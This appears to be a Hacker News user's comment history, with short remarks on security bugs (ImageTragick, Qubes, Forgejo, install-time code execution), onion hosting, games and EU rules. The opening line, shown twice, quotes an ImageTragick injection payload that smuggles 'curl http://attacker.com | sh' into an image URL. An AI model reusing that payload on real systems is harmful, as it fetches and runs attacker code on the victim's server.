Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"
1,168 karma · joined January 25, 2023
Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"
Of course, for me Celsius is more natural and intuitive, but again - that's because I'm used to it.
In enterprise environment: definitely, for both compliance, management and actual security reasons.
You should be OK, but if attacker takes over your user (or any user in your forgejo instance) they can execute code on the host server - as you said yourself. In other words, it allows them to achieve remote code execution, so it's a RCE.
It can't be done without authenticating first, but there's nothing about RCE that says that it must be sent from unauthenticated connection.
Let's not pretend that 90% of HN comments are world-changing. Maybe you are different, but a lot of my would-be comments are knee-jerk reactions that won't actually bring anything substantial to the discussion. Often in political comment chains. Yes, I feel I'm right, but it's still probably not worth posting. I really think that sometimes stopping before posting is better for everyone involved.
I also have well thought comments, where I share my thoughts on things I'm an expert in. I do post them. But a lot of the comments is not really that valuable.
>comments I spent literal hours on[2]
It may make you feel better that I saw both of your posts before (I may spend too much time on HN). They are good, though a bit verbose - maybe this intimidates people. But in this case I agree with GP - if I was spending literal hours responding to comments here I should definitely stop myself.
>That’s a weird comparaison between one or two brand and "an industry".
In other words, Impossible and Beyond are not the only companies in meat replacement space. They are probably the largest, but comparing them to the whole industry makes no sense.
[1] Relax, I'm joking.
The second verse was immediately clear.
And what about signal? I am pretty sure many violent/terrorist groups use it too.
I don't have an opinion about this group, because I didn't even know it existed. But, like often with things related to the free speech, I think this topic is more complex than you make it out to be.
You don't need to pay to host onion websites (.onion domains are free and have no central registry). Though that of course really limits the possible outreach, because most people are not used to browsing onionsites.
I don't agree with what you wrote literally (I almost exclusively play old and old-ish games, and I have fun), but:
>Path of Exile is a 2013 free-to-play action role-playing video game developed and published by Grinding Gear Games
I'm confused. Why is your example of a modern game is a game from 2013? Most people's backlog is probably shorter than 13 years, so if 13 year old games are fine then I'm not sure that contradicts OPs point.
Worth noting that (as I understand) this vulnerability occurs only when doing copy-to-VM from Dom0:
>Note that the VM variant of `qvm-copy-to-vm` is not affected, as its version of the error reporting function does not use `system()`:
Since you should not use Dom0 for regular work, and definitely not for interacting with likely-to-be-infected VMs, the scope of this attack is smaller than it sounds. On the flip side, when it works, it elevates privileges straight to Dom0.
I strongly prefer self-checkout. If self-checkout is available, I will use it. Most people I know have the same preference (to varying degrees, I am a bit extreme in that I will wait for self-checkout even if normal checkout is open and there is no queue).
In most sane environments, like for example native languages, this is already the case. Downloading a .dll file and putting it in an appropriate directory won't, by itself, execute code in that library.
You may argue that the code will get executed at some point anyway, but that's besides the point. Sandboxing the build environment is a different problem than sandboxing the test/staging/production environment.
I think we both agree that "adding random obstacles that don't actually protect anything" is not a valid approach to security, but my mental model of the build step is "transformation of input data into output data", and while this step may produce a malicious output from malicious inputs, it should not do anything malicious itself. For example, "gcc source.c" should not execute arbitrary code by itself.
Definitely. On the other hand, in my opinion, "not running arbitrary code during package install" is not a "half-measure", it's a basic sanity. This whole arbitrary code execution at install time is a convenience feature that was adapted by some package managers, but it was never a good idea.
Fortunately, nixos solves that for me in most cases.
>The project’s binary distributions didn’t include the required MIT license notice for the llama.cpp code they were shipping. This isn’t a matter of open-source etiquette, the MIT license has exactly one major requirement: include the copyright notice. Ollama didn’t.
Or maybe linguists are actually interested in having maximally faithful IPA representation and manually normalizing it? You are clearly way more knowledgeable about that topic than I, so I'm curious what you think.
>you shed a layer of security by deciding to make your address public, non of which would benefit the whole point
It's possible to host something with no intention of making it internet-public. I also have services like that, that I only use myself or with friends. GP argument is that they don't want to share the onion link to their website, because (bluntly) we are not invited. Onion domains are actually relatively private (i mean unguessable - unlike clearnet domains), so it's possible to host private websites without any additional authorization.
Having said that, onion links carry a implicit baggage, so while I think they're great for sharing things with (technical) friends or a private VPN, they're probably not the best way to host services intended for public.
>(...) If you add a user, by editing .gitroot/users.yml or by merging a branch where a user has added itself, this user will be able to push to the default branch. All GitRoot features are articulated around this concept (...)
Maybe you just don't notice? It can be pretty invisible sometimes. I sometimes notice that image soon after page load an image is slightly blurry, and then another pass "sharpens" it. Yeah it's not like in the "old times" when the first progressive level was almost unreadable, but there's still value in sending a lower resolution version of image in 30% of the total file-size, basically for free
This is moot anyway, because most other learning methods require longer focus and are not possible to do while on the go, during short commute in a tram, or 3 minute wait in a queue, and much more.
Because of my job (and hobbies), I spend a lot of time thinking and straining my brain. After 14 hours of working I don't feel the urge to read Nietzsche or Plato. I admire people who do, but for me it's just a way to relax (and maybe escape from daily chores). Am I doing it bad?
For example, how many children will this actually protect? How many children will this harm? How many adults will be harmed by inevitable side-effects that arise? Those questions are not discussed or even considered.
>Article 6(3) of the GSR states that the system should be designed in such a way that it does not continuously record or retain data other than what is necessary for its purpose
I get that there are problems, but it doesn't sound that bad to me? Car drivers kill tens of thousands of people every year in Europe. If we can improve this 25% (more realistically, 10%) it's a huge step forward.
6 points, 1 comment (by author)
Checks out, I guess.
>The purpose of this list is to allow IPFS node operators (e.g. someone running a public IPFS gateway) to opt into not hosting previously flagged content.
IPFS node operators, who are supposedly interested in hosting malicious content (and i2p-hosted phishings are a real problem) can OPT INTO using this list.
In this case, I don't see how that's any problem for piracy - people can just use one of the bad/unfiltered nodes.